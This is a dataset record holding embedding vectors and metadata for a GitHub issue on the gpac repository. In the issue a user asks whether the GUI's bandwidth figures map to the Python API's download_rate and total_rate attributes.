-0.010243363678455353, 0.012328104116022587, 0.002456243149936199, 0.014989935792982578, -0.0009603152866475284, -0.024353235960006714, 0.007127072662115097, 0.026546180248260498, 0.0014833039604127407, -0.0008922365959733725, -0.0028421725146472454, 0.0020017840433865786, -0.0015888033667579293, 0.008317322470247746, 0.0023678760044276714, -0.0009156809537671506, -0.01073389034718275, 0.009716767817735672, -0.009139676578342915, -0.013749190606176853, -0.004072097595781088, 0.027945626527071, 0.010308286175131798, -0.01654808036983013, 0.008908840827643871, -0.006697861012071371, 0.027931198477745056, 0.013936745002865791, 0.006982799619436264, -0.01646151766180992, 0.018091799691319466, 0.0023877136409282684, -0.014528263360261917, -0.006907056551426649, 0.012825844809412956, -0.010084663517773151, 0.011758226901292801, -0.007116252090781927, -0.0010369601659476757, 0.024800481274724007, -0.02037130855023861, 0.006993620190769434, 0.008317322470247746, 0.0030657954048365355, -0.009918749332427979, -0.004962981678545475, -0.007913358509540558, -0.007913358509540558, 0.001942271483130753, -0.0060125659219920635, -0.007375943008810282, 0.0039133974350988865, 0.01924598030745983, 0.00772580411285162, 0.011787081137299538, -0.004263259004801512, -0.0054895770736038685, 0.0004352978430688381, 0.002144253347069025, -0.016750063747167587, 0.006232581567019224, -0.0040071746334433556, -0.02638748101890087, 0.00855537224560976, 0.012695999816060066, 0.009204600006341934, -0.026401909068226814, 0.0008214528206735849, -0.0003498613659758121, -0.002441815799102187, 0.004587872419506311, 0.005767302121967077, 0.011520177125930786, -0.00010786639904836193, -0.021006109192967415, 0.003920611459761858, -0.010026954114437103, -0.011310981586575508, 0.015826717019081116, -0.0011749209370464087, -0.0027898738626390696, 0.00622536800801754, -0.018337063491344452, 0.005514824762940407, 0.011202776804566383, 0.011368690058588982, 0.004555411171168089, 0.007181174587458372, 0.002405747538432479, 0.002032442018389702, -0.004147840663790703, 0.006979193072766066, -0.004205550067126751, 0.016216253861784935, 0.005168570205569267, 0.008035990409553051, 0.01963551715016365, -0.009276735596358776, 0.0013237022794783115, 0.0004256045212969184, -0.011188349686563015, -0.019015144556760788, 0.005193817894905806, 0.009969244711101055, 0.012883554212749004, 0.0025878918822854757, -0.012342531234025955, 0.011484108865261078, 0.006881808862090111, -0.006809672340750694, -0.016865480691194534, -0.03182656317949295, -0.006420135963708162, 0.010769958607852459, -0.01281863171607256, 0.012393026612699032, 0.01911613531410694, -0.007769085932523012, -0.01732715405523777, -0.015235199593007565, -0.01009909063577652, -0.017053036019206047, 0.000012497061106842011, -0.015090926550328732, -0.003680757712572813, -0.0032226918265223503, 0.004245224874466658, 0.009940390475094318, -0.018423626199364662, 0.0205011535435915, -0.0016510209534317255, 0.014636468142271042, -0.00017436711641494185, 0.006026993039995432, -0.014665322378277779, 0.008353390730917454, -0.023603016510605812, -0.009002617560327053, -0.007985495030879974, 0.005247920285910368, -0.02468506246805191, 0.04648467153310776, -0.00926952250301838, 0.00582140451297164, -0.010048595257103443, 0.010676181875169277, 0.01706746220588684, -0.012595009058713913, -0.008764567784965038, -0.00723888399079442, -0.01123163104057312, -0.0056374566629529, 0.008043204434216022, -0.009276735596358776, 0.013828540220856667, -0.006878201849758625, -0.004082918167114258, -0.0024941146839410067, -0.013943959027528763, 0.010041381232440472, 0.01614411734044552, -0.008540945127606392, 0.005994531791657209, -0.009803331457078457, -0.016692353412508965, 0.017572417855262756, 0.009716767817735672, -0.005381372757256031, -0.003190230578184128, 0.00011936313239857554, 0.016822200268507004, -0.01627396233379841, -0.01362655870616436, 0.01458597183227539, -0.0009413795196451247, 0.015595881268382072, 0.023256761953234673, -0.0070549361407756805, -0.017168454825878143, 0.019779790192842484, -0.00461312010884285, -0.004021602217108011, -0.010279431007802486, -0.0005094630760140717, -0.008497663773596287, 0.02011161670088768, -0.004656401928514242, -0.00875014066696167, -0.017529135569930077, 0.0026780623011291027, -0.011722158640623093, -0.01077717263251543, 0.0014715817524120212, 0.01659136265516281, 0.005825011059641838, 0.03984812647104263, 0.024973608553409576, 0.00043867924250662327, 0.00243279873393476, 0.0011108999606221914, -0.004847563337534666, 0.0051108612678945065, -0.010185654275119305, -0.022881653159856796, 0.0043029338121414185, 0.004706897772848606, 0.001508551649749279, -0.017658980563282967, 0.014549904502928257, -0.005085613578557968, -0.02367515303194523, 0.011022436432540417, 0.0060486337170004845, 0.005128895398229361, -0.00021032258518971503, 0.020227035507559776, -0.010964727029204369, -0.0033723749220371246, 0.017601272091269493, -0.006715895142406225, -0.014874517917633057, 0.0023913204204291105, 0.019606662914156914, 0.011505750007927418, 0.027945626527071, 0.012400240637362003, -0.003311058972030878, 0.002306560054421425, 0.0048259226605296135, -0.0015256840270012617, 0.019087281078100204, 0.028277453035116196, 0.011873644776642323, 0.018928581848740578, -0.013958386145532131, -0.0010017936583608389, -0.03618359938263893, 0.012335318140685558, 0.03309616073966026, 0.029417207464575768, -0.008201904594898224, 0.010964727029204369, 0.017615700140595436, -0.0119241401553154, 0.0044363862834870815, 0.022016016766428947, 0.021410072222352028, -0.03722236305475235, 0.005691559053957462, 0.0023606624454259872, -0.009356086142361164, 0.029330644756555557, 0.00016918231267482042, 0.013027827255427837, -0.002840369241312146, 0.015812290832400322, -0.0013570652808994055, -0.02624320797622204, -0.0029972658958286047, 0.005550893023610115, -0.014023308642208576, -0.008476022630929947, 0.001552735222503543, 0.012688785791397095, 0.020731989294290543, 0.00030545241315849125, -0.005298415664583445, -0.00446163397282362, 0.006589656695723534, 0.02381942607462406, 0.006380461156368256, 0.008894413709640503, -0.023213481530547142, 0.004241617862135172, -0.004508522804826498, 0.0004882729845121503, 0.0043317885138094425, -0.014679749496281147, -0.021972736343741417, 0.003103666938841343, 0.0003496359277050942, -0.0003237119235564023, 0.012732068076729774, -0.0022686885204166174, -0.00361944199539721, -0.012919622473418713, -0.01358327642083168, -0.022362271323800087, -0.000017569149349583313, 0.0022759020794183016, 0.00020671576203312725, -0.024670636281371117, 0.007769085932523012, 0.008100912906229496, 0.009911536239087582, 0.01571130007505417, 0.011455253697931767, -0.00006548628880409524, -0.014391204342246056, -0.029662471264600754, -0.04134856164455414, -0.009514786303043365, -0.0035707498900592327, -0.03124947100877762, 0.003473365679383278, -0.02490147203207016, -0.004212763626128435, -0.020746417343616486, 0.002037852304056287, 0.011116213165223598, -0.02608450874686241, 0.024887043982744217, 0.004537377040833235, 0.00429932726547122, 0.017255017533898354, -0.004494095221161842, -0.012724854052066803, 0.004627547692507505, 0.009485931135714054, 0.013871822506189346, -0.002232620492577553, -0.010971940122544765, 0.006034206598997116, -0.005976497661322355, -0.006881808862090111, 0.002025228226557374, 0.007249704096466303, -0.013330799527466297, -0.019664371386170387, -0.0017817681655287743, -0.00836060382425785, 0.005042331758886576, 0.005143322516232729, 0.006459811236709356, 0.004609513562172651, 0.0171540267765522, -0.0019134170142933726, -0.012941263616085052, 0.004699683748185635, -0.028219744563102722, 0.01057519018650055, 0.010784385725855827, -0.026445189490914345, -0.018293781206011772, -0.017428144812583923, 0.006308324635028839, -0.019058426842093468, -0.0032497430220246315, 0.021626481786370277, -0.00195128854829818, -0.008418313227593899, -0.01562473550438881, 0.005190211348235607, 0.00894490908831358, 0.020933972671628, -0.018163936212658882, -0.00280790776014328, 0.002337218029424548, -0.005283988546580076, 0.015235199593007565, -0.001598722068592906, 0.005504004191607237, -0.0120828403159976, -0.00925509538501501, 0.007094610948115587, 0.004519342910498381, -0.0027916771359741688, 0.011729372665286064, -0.03130717948079109, 0.009500359185039997, -0.005190211348235607, 0.023833854123950005, -0.0022019625175744295, 0.007361515425145626, -0.020472299307584763, 0.0023029532749205828, 0.005421047564595938, -0.011880858801305294, 0.004627547692507505, 0.01527848094701767, 0.008540945127606392, -0.006499486044049263, 0.007761872373521328, -0.010286645032465458, 0.010632899589836597, 0.05107254534959793, 0.014326280914247036, 0.007733018137514591, 0.022823944687843323, -0.003217281773686409, 0.010964727029204369, 0.006953945383429527, -0.014355136081576347, -0.01412429939955473, 0.021828463301062584, -0.013763617724180222, -0.004155054222792387, -0.0035166474990546703, -0.022780662402510643, -0.012847485952079296, -0.016201825812458992, 0.0037474839482456446, 0.02468506246805191, -0.005136108957231045, -0.009009831584990025, 0.014340708963572979, 0.01460761297494173, 0.009154104627668858, 0.02368958108127117, 0.007819581776857376, 0.022261280566453934, -0.016576936468482018, -0.022910507395863533, 0.0038592952769249678, -0.04169481620192528, 0.011000795289874077, -0.010488626547157764, 0.014860090799629688, 0.01140475831925869, 0.019274836406111717, -0.0006059454171918333, 0.0014941244153305888, 0.027354108169674873, -0.0037366636097431183, -0.02716655284166336, -0.008007136173546314, 0.025391999632120132, -0.03326928988099098, -0.01493222638964653, 0.006907056551426649, 0.004544590599834919, -0.007754658814519644, 0.006578836124390364, 0.006903449539095163, 0.030499253422021866, -0.009962031617760658, -0.0074156178161501884, 0.008259613066911697, 0.017009753733873367, 0.01784653589129448, -0.01075553148984909, 0.005013477057218552, -0.017009753733873367, -0.00530202267691493, -0.0347408726811409, 0.009146890603005886, -0.009673486463725567, 0.004100952297449112, -0.0007664488512091339, -0.01775997132062912, 0.009377727285027504, 0.0010207295417785645, 0.03479858115315437, -0.0070549361407756805, -0.010488626547157764, 0.005139715503901243, -0.009976458735764027, -0.012378599494695663, -0.02155434526503086, -0.0029593941289931536, -0.01806294545531273, 0.0038665090687572956, 0.0013291124487295747, -0.0031721964478492737, -0.021756326779723167, 0.019577808678150177, -0.016750063747167587, 0.020270317792892456, 0.019000718370079994, -0.014333494938910007, -0.0035328783560544252, -0.023227907717227936, -0.004194729495793581, -0.006218154449015856, -0.005633849650621414, 0.04244503378868103, 0.004609513562172651, -0.006593263242393732, 0.00443999283015728, -0.0036843647249042988, -0.007754658814519644, -0.0017817681655287743, 0.01763012632727623, -0.0006185693200677633, 0.023516453802585602, 0.008627508766949177, -0.01667792722582817, -0.025233298540115356, -0.0006604985683225095, 0.010842095129191875, -0.008237972855567932, -0.013640985824167728, -0.025016890838742256, -0.013842967338860035, -0.012638290412724018, 0.017572417855262756, -0.01462925411760807, -0.007036902010440826, 0.004973802249878645, 0.015220772475004196, 0.003029727144166827, -0.0018881692085415125, -0.013366867788136005, 0.008641935884952545, -0.00007771566015435383, -0.02442537248134613, -0.010683394968509674, 0.03673183545470238, 0.001508551649749279, 0.01627396233379841, 0.0029648044146597385, 0.003495006589218974, 0.011801508255302906, -0.017990808933973312, 0.011383118107914925, 0.0005193817778490484, -0.0032587600871920586, 0.013338013552129269, -0.004699683748185635, -0.005457115825265646, 0.0306435264647007, 0.012609436176717281, 0.02938835322856903, 0.0012750101741403341, 0.017038607969880104, -0.0005991826765239239, 0.031278327107429504, 0.0023949271999299526, 0.022924935445189476, -0.026878008618950844, 0.009990885853767395, 0.015523744747042656, 0.002622156636789441, 0.011505750007927418, 0.020010625943541527, -0.0021640907507389784, 0.011852004565298557, 0.012443521991372108, 0.004728538449853659, 0.007487754337489605, 0.0006983701605349779, 0.010813240893185139, 0.01806294545531273, 0.001515765325166285, -0.002328200964257121, 0.01851019077003002, 0.01797638088464737, 0.014160367660224438, -0.008468808606266975, 0.027786925435066223, 0.0142974266782403, 0.016201825812458992, 0.004959374666213989, -0.0010279431007802486, -0.005612208973616362, -0.020400162786245346, 0.0015833930810913444, 0.004284899681806564, -0.004158661235123873, 0.007480540778487921, 0.013172099366784096, 0.012191045098006725, 0.02233341708779335, -0.02181403525173664, 0.018091799691319466, 0.024829335510730743, 0.013085535727441311, -0.0142974266782403, -0.011498535983264446, 0.038289979100227356, -0.010640113614499569, -0.012717640027403831, 0.0030513680540025234, -0.003898970317095518, 0.01767340861260891, 0.0036500999704003334, -0.018827591091394424, 0.006755570415407419, -0.014961081556975842, -0.006384068168699741, 0.004090131726115942, 0.0014869107399135828, 0.002229013480246067, 0.025738254189491272, 0.011411972343921661, 0.0072352769784629345, -0.004497702233493328, 0.01548046339303255, 0.012479590252041817 ]
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
![image](https://user-images.githubusercontent.com/68137277/178431338-a8f57637-ddc3-43cd-85f4-05c9967fe0eb.png) this picture gpac -gui url in the picture the BW is python api(self.download_rate ) right? and all tiles needed bandwidth is python api (self.total_rate) right?
I want to ask some questions about python api
https://api.github.com/repos/gpac/gpac/issues/2224/comments
1
2022-07-12T07:33:07
2022-07-21T05:37:14Z
https://github.com/gpac/gpac/issues/2224
1,301,660,548
2,224
false
This is a GitHub Issue repo:gpac owner:gpac Title : I want to ask some questions about python api Issue date: --- start body --- ![image](https://user-images.githubusercontent.com/68137277/178431338-a8f57637-ddc3-43cd-85f4-05c9967fe0eb.png) this picture gpac -gui url in the picture the BW is python api(self.download_rate ) right? and all tiles needed bandwidth is python api (self.total_rate) right? --- end body ---
423
[ -0.030470898374915123, 0.03639908879995346, -0.014405502006411552, 0.012678916566073895, 0.006224599666893482, -0.0037662533577531576, -0.005568793509155512, 0.05836303159594536, -0.028544235974550247, 0.020422615110874176, -0.04309794306755066, -0.0017590051284059882, 0.03536165505647659, 0.018881285563111305, 0.009173874743282795, 0.02615813910961151, 0.015650421380996704, 0.011285792104899883, 0.0028362683951854706, -0.001466300804167986, 0.022393738850951195, -0.04861116036772728, -0.013049428351223469, -0.011478458531200886, -0.028396030887961388, 0.0035995228681713343, -0.003258652053773403, 0.006024523172527552, -0.026943624019622803, -0.02460198849439621, 0.022897634655237198, 0.022897634655237198, 0.016421087086200714, 0.003643984440714121, 0.00932207889854908, -0.03992636129260063, 0.04896685108542442, 0.03393888846039772, 0.01101161353290081, -0.0070397257804870605, -0.024231476709246635, 0.0015070571098476648, -0.02417219616472721, 0.015020552091300488, -0.03791077435016632, 0.013894195668399334, 0.012864172458648682, 0.055902834981679916, 0.045024603605270386, -0.027921775355935097, 0.016243241727352142, -0.040104206651449203, -0.013812683522701263, -0.013486633077263832, 0.003688445780426264, -0.03396853059530258, 0.04019312933087349, -0.015398474410176277, -0.0077436985448002815, -0.03423529863357544, 0.019637130200862885, 0.005272384267300367, -0.043216507881879807, 0.028351569548249245, -0.032634686678647995, 0.019681591540575027, -0.03456134721636772, 0.06289809942245483, 0.006713675335049629, 0.044698555022478104, 0.005553973373025656, 0.0032216007821261883, -0.002819595392793417, 0.005861497949808836, 0.025906190276145935, -0.03041161596775055, 0.033108942210674286, 0.0010346544440835714, 0.01972605288028717, 0.03204186633229256, -0.034027811139822006, 0.026350805535912514, -0.031152639538049698, 0.019029490649700165, -0.00809939019382, 0.013234684243798256, -0.07119756191968918, -0.07362812012434006, -0.012508480809628963, 0.022675327956676483, 0.015709703788161278, 0.01757708378136158, 0.009492514654994011, -0.02460198849439621, 0.038740724325180054, -0.03610267862677574, -0.008262415416538715, -0.006973033770918846, -0.013834914192557335, 0.003143793437629938, 0.0071471743285655975, 0.0008100316044874489, -0.01360519602894783, -0.03702154755592346, 0.03376104310154915, -0.001978533575311303, 0.02156379260122776, -0.039392825216054916, -0.0195482075214386, 0.0769479051232338, 0.0005854087648913264, -0.00003878796269418672, -0.004305348265916109, 0.006135676987469196, -0.020304052159190178, 0.0390964150428772, -0.04223835468292236, -0.03358319774270058, 0.01925179734826088, -0.03773292899131775, 0.011041253805160522, -0.0178734939545393, -0.05347227677702904, -0.024127734825015068, -0.007095302455127239, 0.06008220836520195, -0.016910161823034286, -0.004983384627848864, -0.0035495038609951735, -0.04048953950405121, -0.03180474042892456, 0.012241712771356106, -0.020882049575448036, -0.03456134721636772, 0.03841467201709747, -0.009685181081295013, 0.004749962594360113, 0.05270161107182503, 0.014242476783692837, -0.01193048246204853, -0.054213300347328186, -0.04404645413160324, 0.05273125320672989, -0.013471812009811401, -0.018466312438249588, 0.0014903841074556112, 0.019755693152546883, 0.01619878038764, -0.027136290445923805, 0.01759190484881401, -0.009292437694966793, -0.026350805535912514, 0.007061956450343132, 0.01619878038764, 0.006843354552984238, -0.01852559484541416, -0.003529125591740012, 0.02888510748744011, 0.000013445528566080611, 0.027580903843045235, -0.005253858398646116, -0.01682123914361, 0.04155661165714264, 0.023297786712646484, 0.019073951989412308, -0.014909397810697556, 0.042564406991004944, 0.00045827688882127404, -0.042742252349853516, 0.014961269684135914, 0.007210161071270704, -0.01622842065989971, -0.017088009044528008, 0.031389765441417694, -0.046862341463565826, -0.014953860081732273, 0.014783424325287342, 0.015932010486721992, -0.017473340034484863, 0.005150115117430687, -0.009433232247829437, 0.0010281704599037766, 0.02630634419620037, 0.009522155858576298, -0.01695462316274643, -0.02492803893983364, 0.036784421652555466, -0.0016728611662983894, -0.009951949119567871, -0.03622124344110489, 0.02660275250673294, 0.013249505311250687, 0.025491217151284218, -0.04452070966362953, 0.009603668004274368, -0.015798626467585564, -0.03974851593375206, -0.00458323210477829, -0.00023319091997109354, -0.014049810357391834, -0.01652483083307743, -0.023490453138947487, -0.00046452926471829414, -0.008729260414838791, -0.04176409915089607, 0.015413294546306133, -0.00018502437160350382, -0.004442437551915646, 0.004216425120830536, -0.04478747770190239, -0.004034874495118856, -0.0520198680460453, -0.013242094777524471, 0.0022730904165655375, -0.01790313422679901, 0.009514745324850082, -0.0069248671643435955, -0.02417219616472721, 0.014620399102568626, -0.0115451505407691, 0.021059894934296608, 0.024038810282945633, 0.023949887603521347, -0.003831092966720462, -0.03180474042892456, -0.019207336008548737, 0.009314668364822865, -0.00488705188035965, -0.005602139513939619, -0.004727731458842754, -0.00045202451292425394, 0.008966387249529362, -0.016006113961338997, -0.004079335834830999, -0.019607488065958023, -0.010507716797292233, 0.023623837158083916, -0.014323989860713482, -0.028707260265946388, 0.019829796627163887, -0.015027961693704128, 0.021178459748625755, -0.017354777082800865, -0.016243241727352142, 0.032605044543743134, 0.02383132465183735, 0.01084117777645588, 0.004316463600844145, 0.00932207889854908, -0.027269674465060234, 0.005553973373025656, -0.007180520333349705, 0.03055982105433941, 0.0030974794644862413, -0.010596639476716518, -0.011508098803460598, 0.02965577132999897, 0.017917955294251442, -0.006884110625833273, -0.047455161809921265, -0.008277235552668571, 0.00714346906170249, -0.01816990226507187, -0.024572348222136497, -0.015339192003011703, -0.050152488052845, 0.006450612097978592, -0.01819954439997673, -0.014679680578410625, -0.020896870642900467, 0.01865897886455059, 0.029463104903697968, -0.025120705366134644, 0.013405120000243187, -0.03749580308794975, 0.013464401476085186, -0.006395034957677126, -0.01367188896983862, 0.03651764988899231, -0.004616578109562397, -0.015872729942202568, 0.017651185393333435, -0.014850116334855556, 0.04292009770870209, -0.0150501923635602, 0.002602845896035433, 0.012723377905786037, -0.009937128983438015, -0.041052717715501785, -0.008217954076826572, 0.016776777803897858, 0.018080979585647583, -0.0063209328800439835, 0.002736230380833149, 0.02018548734486103, 0.02841085195541382, -0.023282967507839203, -0.006958213169127703, 0.017947595566511154, 0.009077541530132294, -0.04508388787508011, 0.03577662631869316, -0.02154897153377533, -0.02918151579797268, 0.0026510125026106834, -0.019666770473122597, 0.00832910742610693, 0.05240520089864731, 0.023445991799235344, 0.003108594799414277, 0.028840644285082817, -0.050211772322654724, -0.030619101598858833, -0.016391444951295853, 0.0250762440264225, 0.04481711611151695, -0.006450612097978592, -0.03118227981030941, -0.04063774272799492, 0.005805921275168657, 0.015680063515901566, 0.04416501522064209, -0.04001528397202492, 0.029122233390808105, 0.008899695239961147, 0.001997058978304267, 0.007588083390146494, -0.02935936115682125, 0.0011152407387271523, -0.0047981287352740765, 0.005050077103078365, -0.007510276045650244, -0.011960123665630817, -0.010959741659462452, 0.029833616688847542, -0.059370823204517365, -0.045943472534418106, -0.014909397810697556, 0.019177695736289024, 0.015828268602490425, 0.027136290445923805, -0.009603668004274368, 0.05059710144996643, -0.022082507610321045, 0.01775492914021015, -0.03716975077986717, -0.03299037739634514, 0.05044889822602272, 0.010500307194888592, 0.03957067057490349, 0.0009938981384038925, 0.041971586644649506, 0.009529565460979939, 0.023579375818371773, 0.014368451200425625, 0.00909236166626215, -0.024350041523575783, -0.041793741285800934, 0.00028344159363768995, 0.004901872016489506, 0.032605044543743134, -0.035984113812446594, 0.010500307194888592, 0.04499496519565582, -0.0007109196740202606, 0.03041161596775055, -0.012086098082363605, -0.02721039205789566, 0.01972605288028717, -0.007184225600212812, -0.0010374332778155804, 0.019963180646300316, -0.047306958585977554, 0.011893431656062603, -0.039837438613176346, 0.028944388031959534, 0.0018229184206575155, -0.015961652621626854, -0.06669213622808456, 0.005450229626148939, -0.061060357838869095, 0.014168374240398407, 0.027328956872224808, -0.023445991799235344, 0.0281144417822361, 0.007488045375794172, -0.0025343012530356646, 0.01619878038764, 0.001987796276807785, -0.004561001434922218, -0.03251612186431885, -0.01862933672964573, -0.0012467724736779928, -0.030678384006023407, -0.023001378402113914, -0.023653479292988777, -0.029225977137684822, -0.021489689126610756, 0.012100918218493462, -0.016332164406776428, 0.05308694392442703, -0.013464401476085186, 0.014857526868581772, 0.04262368753552437, 0.0022397444117814302, 0.003156761173158884, 0.0017238064901903272, -0.00714346906170249, 0.030055923387408257, -0.02397952973842621, -0.007595493458211422, -0.010818947106599808, -0.030352333560585976, -0.007602903991937637, 0.013197633437812328, 0.03820718452334404, -0.017532622441649437, 0.03162689507007599, -0.014294348657131195, 0.020363332703709602, 0.012189840897917747, -0.008958977647125721, -0.008958977647125721, -0.013738580979406834, -0.00006171338463900611, -0.004116387106478214, 0.01729549467563629, 0.036310166120529175, 0.011937892995774746, -0.030352333560585976, 0.03962995111942291, -0.01261222455650568, -0.007958595640957355, -0.012419558130204678, 0.03696226701140404, 0.017517801374197006, -0.03423529863357544, -0.0077955699525773525, 0.006891521159559488, -0.03930390253663063, -0.05439114570617676, -0.008847823366522789, 0.030011462047696114, 0.016510009765625, 0.01076707523316145, -0.0026510125026106834, -0.031241562217473984, -0.05702918767929077, 0.02738823927938938, -0.020511537790298462, -0.015857908874750137, 0.004720321390777826, -0.017354777082800865, -0.027536442503333092, -0.007684416603296995, -0.01542811468243599, -0.024646449834108353, -0.002221218775957823, 0.02552085928618908, -0.03832574933767319, -0.035391293466091156, -0.0036995611153542995, -0.003612490836530924, 0.004579526837915182, 0.03213078901171684, 0.0015116884605959058, -0.01359778642654419, -0.018896106630563736, 0.017962416633963585, -0.007906723767518997, -0.014924218878149986, 0.00028969396953471005, 0.04772192984819412, 0.03058946132659912, -0.008299466222524643, -0.0017154699889943004, 0.01862933672964573, -0.024083271622657776, 0.021949123591184616, -0.0034031516406685114, 0.00023990643967408687, -0.04665485769510269, 0.0014487014850601554, 0.005894843954592943, -0.012056456878781319, -0.01908877305686474, -0.009010848589241505, 0.003340164665132761, 0.006024523172527552, -0.013716350309550762, 0.0074584041722118855, 0.02584690973162651, 0.026350805535912514, -0.002743640448898077, 0.003971887286752462, 0.005739229265600443, 0.01652483083307743, -0.006309817545115948, 0.029596488922834396, -0.014138733968138695, -0.014042400754988194, 0.0098704369738698, -0.008388388901948929, -0.012508480809628963, 0.032605044543743134, -0.0019989116117358208, -0.005994882434606552, 0.04111199826002121, -0.028781363740563393, -0.012871582992374897, -0.0034235299099236727, -0.0023045840207487345, -0.016450727358460426, -0.04810726270079613, -0.01725103333592415, -0.019918719306588173, -0.023119941353797913, -0.025446755811572075, 0.03995600342750549, -0.0049648592248559, -0.02703254669904709, -0.029833616688847542, -0.004827769938856363, 0.02386096492409706, -0.002478724578395486, 0.01496868021786213, -0.018095800653100014, 0.02341635152697563, -0.005376127548515797, -0.017547443509101868, -0.02584690973162651, -0.023179223760962486, 0.00233051972463727, 0.024705732241272926, -0.008921925909817219, 0.024379681795835495, 0.009803744032979012, 0.01788831315934658, 0.009499925188720226, 0.013116120360791683, -0.04855187609791756, 0.04206050932407379, -0.02935936115682125, 0.03026341088116169, -0.012545532546937466, -0.017013905569911003, 0.00683594448491931, 0.023149583488702774, -0.0046388087794184685, -0.01329396665096283, 0.005361306946724653, -0.035835910588502884, 0.0032512417528778315, 0.025313371792435646, 0.02461680956184864, 0.003156761173158884, 0.037999700754880905, -0.00926279742270708, -0.007276853546500206, 0.015813447535037994, 0.006998969707638025, 0.044846758246421814, -0.00010519063653191552, 0.0006196811445988715, 0.009536975994706154, 0.0033290493302047253, -0.02706218883395195, -0.006361688952893019, -0.0045943474397063255, -0.02688434161245823, 0.008440260775387287, -0.026528650894761086, -0.017784571275115013, 0.03290145471692085, -0.0016459990292787552, -0.004331283736974001, 0.04297937825322151, -0.00802528765052557, -0.02844049222767353, 0.021800918504595757, -0.0045313602313399315, -0.03687334433197975, 0.005898549221456051, 0.03183438256382942, 0.02827746793627739, -0.01649518869817257, 0.018718261271715164, -0.011685945093631744, 0.00026074773631989956, -0.044253937900066376, 0.0011689650127664208, 0.02995218150317669, 0.007669596001505852, -0.022230712696909904, 0.03210115060210228, -0.0131605826318264, 0.017621545121073723, 0.02261604554951191, 0.015843087807297707, -0.010730024427175522, -0.014627809636294842, 0.013642247766256332, 0.0015561499167233706, -0.04173445701599121, -0.05320550501346588, -0.0074139428324997425, 0.024957681074738503, 0.004927807953208685, -0.018688619136810303, 0.015546678565442562, 0.014412912540137768, 0.045172810554504395, 0.08145333081483841, -0.015857908874750137, 0.005965241231024265, -0.011441406793892384, 0.00026607385370880365, 0.008566235192120075, -0.006269061006605625, 0.010589229874312878, 0.023786863312125206, -0.03150833025574684, 0.034472424536943436, -0.03832574933767319, 0.0022378917783498764, 0.023105120286345482, 0.007376891560852528, -0.04692162573337555, -0.006591406650841236, -0.017488161101937294, -0.009788923896849155, -0.002886287635192275, -0.007817801088094711, -0.007228686939924955, -0.037525445222854614, 0.000411268207244575, 0.013382889330387115, 0.02921115793287754, -0.020259590819478035, 0.004320168402045965, -0.030189309269189835, 0.013864554464817047, -0.04022277146577835, 0.05501360446214676, -0.0046388087794184685, 0.00734354555606842, -0.011900842189788818, -0.012449199333786964, -0.007384302094578743, 0.03396853059530258, -0.050033923238515854, 0.005861497949808836, -0.021741637960076332, 0.004286822397261858, 0.010529947467148304, -0.02215661108493805, 0.0030845114961266518, 0.007936364971101284, -0.02734377793967724, -0.0011013465700671077, -0.016939803957939148, -0.009010848589241505, -0.004275707062333822, -0.030293051153421402, 0.0027862493880093098, 0.0012551089748740196, -0.009210925549268723, -0.017191750928759575, -0.0010309492936357856, 0.017532622441649437, 0.0017136174719780684, -0.009581437334418297, 0.037821851670742035, 0.04203086718916893, -0.013456991873681545, -0.015813447535037994, -0.009448053315281868, -0.02400917001068592, -0.002708441810682416, -0.035984113812446594, -0.0018590433755889535, -0.015591139905154705, -0.009277617558836937, -0.012093507684767246, -0.0069767385721206665, 0.01047807652503252, -0.004516540095210075, -0.021163638681173325, 0.00240647466853261, -0.0024935449473559856, 0.04955967143177986, 0.024542707949876785, 0.01390901580452919, 0.029537208378314972, 0.019666770473122597, 0.04048953950405121, 0.019177695736289024, 0.0052427430637180805, -0.00030775644700042903, -0.0064876629039645195, -0.04265332967042923, 0.003601375501602888, 0.027951417490839958, -0.01774010993540287, -0.021756457164883614, 0.0178734939545393, -0.0031604664400219917, -0.006028228439390659, -0.026854701340198517, 0.00565030612051487, 0.01116722822189331, 0.0026899161748588085, -0.01124133076518774, -0.011797098442912102, -0.041526973247528076, 0.0019044311484321952, -0.0008095684461295605, -0.012582583352923393, -0.022675327956676483, 0.01772528886795044, 0.020822767168283463, -0.007758518680930138, -0.01392383687198162, -0.015235449187457561, -0.029774334281682968, -0.004108977038413286, 0.0018581170588731766, 0.008173491805791855, -0.008136440999805927, 0.011345073580741882, -0.01772528886795044, -0.01729549467563629, 0.0148352961987257, 0.01852559484541416, 0.0011328400578349829, 0.012745608575642109, -0.023016197606921196, 0.029448283836245537, 0.015472576022148132, 0.00022427547082770616, 0.014042400754988194, -0.008373568765819073, 0.005183461122214794, -0.030055923387408257, -0.003232716117054224, 0.010218718089163303, -0.01230840478092432, 0.02264568582177162, -0.0035735871642827988, -0.030204128473997116, 0.009203515015542507, -0.014072041027247906, 0.03236791864037514, -0.024394502863287926, -0.007802980486303568, 0.011389534920454025, 0.028203364461660385, -0.02230481617152691, -0.043809324502944946, 0.005331666208803654, -0.024942860007286072, 0.03589519113302231, -0.004057105164974928, -0.0029251913074404, -0.011693354696035385, -0.02261604554951191, -0.016880521550774574, -0.006721085403114557, 0.014598168432712555, -0.014724141918122768, 0.007399122230708599, 0.021059894934296608, -0.0024564939085394144, -0.0025250385515391827, 0.028514593839645386, 0.024513065814971924, 0.0006826681201346219, 0.01698426529765129, -0.016702676191926003, 0.014494424685835838, -0.03820718452334404, 0.0035495038609951735, -0.015531858429312706, 0.0284256711602211, 0.03657693415880203, -0.03236791864037514, 0.03467991203069687, -0.0007350029773078859, -0.014427732676267624, 0.017843851819634438, 0.045469217002391815, 0.008833003230392933, 0.002588025527074933, -0.03894820809364319, 0.004627693444490433, -0.009559206664562225, -0.0026417498011142015, 0.010211307555437088, 0.013323607854545116, -0.006558060180395842, 0.03788113594055176, -0.001092083752155304, 0.006583996117115021, -0.037229035049676895, -0.0016756400000303984, 0.0013366215862333775, -0.041941944509744644, -0.009196105413138866, -0.049144696444272995, 0.04692162573337555, 0.0030956268310546875, -0.01618395932018757, 0.008040107786655426, -0.0013004967477172613, -0.022378917783498764, -0.014731552451848984, 0.023016197606921196, -0.015472576022148132, -0.022097328677773476, 0.014494424685835838, -0.03817754611372948, 0.03826646879315376, -0.01590237021446228, 0.003117857500910759, 0.00956661719828844, -0.013760811649262905, 0.007639955263584852, 0.03470955416560173, 0.03287181630730629, 0.016717495396733284, -0.0007294452516362071, 0.008506952784955502, -0.03500596433877945, 0.0028029223904013634, -0.03672513738274574, 0.022038046270608902, 0.000019987379346275702, -0.002097097225487232, -0.015339192003011703, 0.02691398374736309, -0.03373140096664429, -0.031419407576322556, -0.023623837158083916, -0.019488925114274025, -0.012019405141472816, -0.01803651824593544, 0.03236791864037514, -0.020748665556311607, 